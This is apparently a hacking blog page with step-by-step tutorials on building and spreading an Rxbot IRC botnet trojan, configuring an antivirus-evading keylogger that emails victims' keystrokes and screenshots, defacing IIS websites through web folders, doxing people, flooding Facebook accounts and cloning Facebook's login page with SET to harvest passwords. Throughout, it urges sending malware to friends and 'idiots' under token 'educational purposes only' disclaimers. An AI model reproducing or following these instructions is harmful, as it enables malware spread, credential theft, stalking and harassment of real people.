Showing posts with label Computers. Show all posts
Showing posts with label Computers. Show all posts

Monday, 15 September 2014

Creating a Botnet


Botnet
CAUTION!



Q:What is a Botnet?

A: A Botnet is where you send a trojan to someone and when they open it a bot joins your channel on IRC(secretly, they don't know this).Once done the computer is now refered to as a zombie.
Depending on the source you used, the bot can do several things.
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC Takeovers.
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.Open sites.Open commands.Cmd,notepad,html ;

Anything is possible !

Theres the infected computers bots the attacker, the server, and the slave.

Quotes:

"while the term botnet can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka bot herder) can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC bots. Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community."

"Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out low profile DDoS attacks and steal the CD keys for games, he explained. They had a huge weapon and didn't use as much as they could have done, Santorelli told El Reg. The main damage caused in the case is down to the cost of cleaning up infected PCs."

"Botnets are being used for Google Adword click fraud, according to security watchers."

As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.

* Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
* Download and install the Service pack 6
* Download and install Windows SDK
* Open up Microsoft Visual C++ Compilier 6.0
* Go to Tools > Options and Click the Directories tab
* Now, browse to these directories and add them to the list: (Click the dotted box to add)

C:PROGRAM FILESMICROSOFT PLATFORM SDK
C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN
C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE
C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB

NOTE: Make sure they're in the order above (use the arrows to adjust the order)

* Download Rxbot 7.6
* Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Put in the quotations:

char password[] = Bot_login_pass; // bot password (Ex: monkey)
char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net)
char serverpass[] = ; // server password (not usually needed)
char channel[] = #botz_channel; // channel that the bot should join
char chanpass[] = My_channel_pass; // channel password

Optional:

char server2[] = ; // backup server
char channel2[] = ; // backup channel
char chanpass2[] = ; //Backup channel pass

* Make sure Microsoft Visual C++ is open
* Select File > Open Workspace
* Browse to your Rxbot 7.6 folder and open the rBot.dsw file
* Right Click rBot Files and click Build:
* rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

***Now get the rbot and pack it (Use tool in third post and open rbot and click Protect and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways***

 ENJOY !

Creating a Keylogger

A keylogger is a program that runs in the background on someones computer that logs every key they press, and then sends the log of all the pressed keys to the attacker. This essentially allows you the ability to collect all the usernames and passwords typed in.
What you need:

  1. After you downloaded the program, open it up and you should see the builder. Input YOUR email username & password into the boxes. The reason we are doing this is because the keylogger will log INTO your email, then email yourself the logs. I recommend making a new email specifically for keylogging.


  2. Select what email provider you are using here. If you are using gmail, select the first provider, if you are using yahoo, select the second provider, if you are using hotmail or live, select the third option.


  3. Input the subject of the message you will receive every time you receive a keylog. Most people put "Facebook Logger" or something similar.


  4. I recommend checking both of these boxes. The computer info will send the slave's IP address and their computer name. The screenshot will send a picture of the slave's screen whenever the log was sent.


  5. This is the time in between the logs. I usually recommend 5-15 minutes.

  6. At this point I suggest you click Test Email and make sure everything is working fine.


  7. This is what the Icon of the output file will be. It will ONLY take in .ico's. If you do not have any, I suggest either downloading them online, or creating your own. At http://convertico.com/ you can upload a PNG file and it will convert it to ICO for you. 
    Some anti-viruses will detect an icon if it has been used before for malware, so I recommend getting some more obscure icons that have not been used before. After you locate the .ico it should appear in the box located to the right of the browse button.

  8. Click the Extra Options Tab at the top of the builder.


  9. The add to startup option will make the slave file go on startup on the slave's computer, so whenever he reboots his computer, he will become keylogged again. The melt option will make the file go hidden when it is first run. I usually recommend that you check both of them.


  10. This option will allow you to display an error message when the file is first run by the slave. Common messages are "This file is not compatible with your computer."


  11. The Use Downloader function will download and execute a file on the first run of the slave file. You can do this if you want it to execute many different viruses, its a better alternative to binding. Make sure you put a direct link to the file. 
    The Website Visitor function will automatically visit the website on run. It will pop up in the default web browser.


  12. I strongly recommend that you check both of these functions. They will decrease the detection rate and make your logger more secure from whalers. I also recommend that you click Generate Key a few times to get a unique key. This is generating an encryption key to keep all of your information secure.

  13. Now click on the Assembly & Build Tab.


  14. Click the "Randomly Generate" button. Now you can change the assembly to whatever you want it to say. For example, if you want to disguise this as a runescape product, you should change the company to "Jagex LTD." and the Product to "Runescape" and the Copyright to "Jagex LTD. All Rights Reserved". I do not suggest changing the version and File Version. 
    Below is an example:


  15. This is a file pumper, it will increase the size of the output file. You should keep this at 0 unless you want to increase the size of your slave file.


Change the File Name to whatever you are disguising the file as, for example you can change it to "Runescape Pin Generator". Now click build. Wait a bit and it should give you the following message:

  • All you have to do now is go to the folder where your builder is located and you should notice your slave file. You can send it to all your friends now! Remember, to tell which anti-viruses detect your file ONLY use elementscanner.com. Do not use ANY other site.
  • Source- HackersHandBook
  • ISS Exploiting

    This is one of the easiest hacks you can do to a website. It will allow you to change the website around however you want as if you owned it.
    What you need:
    • A IIS vulnerable website. (the best way to find out is to try this hack, if it doesn't work its not vulnerable)
    • Windows xp operating system
    1. Goto start and click on Run
    2. Type this and press ok:
      %WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA1069A2D8-08002B30309D}::{BDEADF00-C265-11d0BCED-00A0C90AB50F}
    3. This should open up web folders. Right click in the folder and choose New then Web folder
    4. Now type in the URL of the vulnerable site (example: http://yoursite.com) and press next.
    5. Click Finish
    6. Now any file you put in this folder will upload to the website. To test to see if you got in, create a text file in notepad and name it test. Then try going to http://yoursite.com/test.txt and if it loads your text file, you've officially hacked the site!
         *** Use for Educational Purposes only !

    Doxing

    What is doxing? It's essentially gathering a bunch of information on a target they generally wouldn't want you to know. Everything from name, e-mail, zip code, and even address.
    What you need:
    • Basic social engineering
    • Notepad
    1. Obtain their IP address. Do this by going to http://whatstheirip.com and enter your e-mail address. This will then give you a set of links.
    2. Take one of these links and trick them into clicking it by saying something like omg check this out or any method you choose.
    3. If your target has e-mailed you, you can get the IP from looking at the e-mail source. To look at the e-mail source for Windows Live users, right click on the message, and click 'View Message Source'.
      When you're looking at the source, look for this: 'Received: by'
      It will show you an IP address. This is the IP address of your slave.
    4. Once you have their IP address, goto http://ipaddress.com and enter it in. You now have the location, zip code, state, country, ISP, and operating system. Fill all this in your notepad and keep going.
    5. Obtain the targets e-mail address. Google the user and put @ at the end. Example: 'username' @. This will pull up any posts online by this person if there are any. Sometimes you can social engineer someones e-mail address just by asking for it, or getting it from a friend. Get clever.
    6. Put in the e-mail of your slave in Facebook search. If your slave uses Facebook, you can find out (at the minimum) their name. If your slave uses Facebook but does not protect their information, you can find out loads of information.
    7. If the target has paypal, heres an easy way to get their information: When you have the e-mail of your slave, login to PayPal. Transfer .01 USD to the e-mail of your slave. When sent, you will have all of the information on the PayPal account. (Name, address, phone, etc.)
    8. If your slave has photos online, save the photo and go to a website named http://tineye.com. On this website, upload the picture of your slave. When it is finished, you can find if this photo is uploaded on any other websites. You can also find out if the photo is fake.
    9. If you have the name of your slave, it is possible you can find the address of your slave. I suggest using the following websites:
      • http://411.com
      • http://whitepages.com

      Using these websites you can also find out their phone.
    10. If your slave has a website, put the website in http://who.is. If the website owner does not use WHOIS Guard Protect, you can find out all information about him (name, phone, address, etc.)
    As always, this information is for educational purposes only!

    Flooding Facebook

    This guide will show you how to flood a persons facebook wall, comments, and messages. What is flooding? Basically, spamming the same thing over and over really quickly, i.e. 1000 wall posts in 1 minute.
    What this requires:
    1. Login to your Facebook account. Then after logging in, open another tab/window then go to m.facebook.com
    2. Go to friends, then type your slave's name then click Search. Now go to your targets profile.
    Wallpost Flood
    1. Open Auto Clicker. Change the Number of Clicks to 9999. NOTE: Leave all the settings as it is exept the Number of Clicks.
    2. Put your comment on the textbox. Then press F2. NOTE: Don't put your cursor on the Post button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.
    3. Now after you saw the progress of click at the taskbar, place your cursor on the Post button.
    4. Now leave your cursor on the Post button while the Auto-Clicker runs. Leave it for atleast a minute.
    5. Finished.
    Comment Flood
    1. Open Auto Clicker. Change the Number of Clicks to 9999. NOTE: Leave all the settings as it is exept the Number of Clicks.
    2. Click your targets profile picture or message you want to flood.
    3. Pick a photo you want to comment on. (You can use Next and Previous Button to Navigate to his other Profile Pics.)
    4. Put your comment on the textbox. Then press F2. NOTE: Don't put your cursor on the Comment button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.
    5. Now after you saw the progress of click at the taskbar (see picture) place your cursor on the Comment button.
    6. Now leave your cursor on the Comment button while the Auto-Clicker runs. Leave it for atleast a minute.
    7. Finished.
    Message Flood
    1. Open Auto Clicker. Change the Number of Clicks to 9999. NOTE: Leave all the settings as it is exept the Number of Clicks.
    2. Click Messages beside his profile picture.
    3. Put anything in the Subject and Body Message.
    4. Then press F2. NOTE: Don't put your cursor on the Send button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.
    5. Now after you saw the progress of click at the taskbar (see picture) place your cursor on the Send button.
    6. Now leave your cursor on the Send button while the Auto-Clicker runs. Leave it for atleast a minute.
    7. Finished.
          ***  Use for Educational Purpose Only !

    Hack Facebook Account Using Backtrack 5


    In this tutorial I am going to show you how to hack Facebook account using Backtrack 5. So just follow the simple steps;

    1- Open your Backtrack 5’s terminal and type this (without ") ;
                                                      
                                                         "  cd /pentest/exploits/set  "

    Backtrack5 1


    2- Now Open social Engineering Tool kit (SET) ./set 

    Backtrack5 2


    3- Just hit "ENTER" and "SET" will Open , Now just select 1st option (Social-Engineering Attacks) and hit "ENTER".After that, Hit "2" (type 2)

    Backtrack5 3



    4- Now Just select 4th Option “Tabnabbing Attack Method” and Hit "ENTER"

    Backtrack5 4



    5-Then select 2nd option “Site Cloner” and Hit "ENTER"

    Backtrack5 5



    6- Now here you need to add the URL of Facebook

    Backtrtack5 6




    7- Now just hit the enter. 


    Backtrack5 6



    8- Open new terminal and just type ifconfig and hit "ENTER "

    Backtrack5 9



    9-Now just copy this IP address (You should get Victim`s IP Address)  and open it in Browser. 

    backtrack5 7




    10-Now here I am just typing test email and password to see whether it works or not. 

    backtrack5 8




    11-Now just hit enter and switch back to our terminal and we found the Email and password ! 

    backtrack5 10



    Note;  This Tutorial is only for Educational Purpose, Don`t use it for Bad Deeds.









    Techzonea. Powered by Blogger.

     

    © 2013 Techzonea. All rights resevered. Designed by Templateism

    Back To Top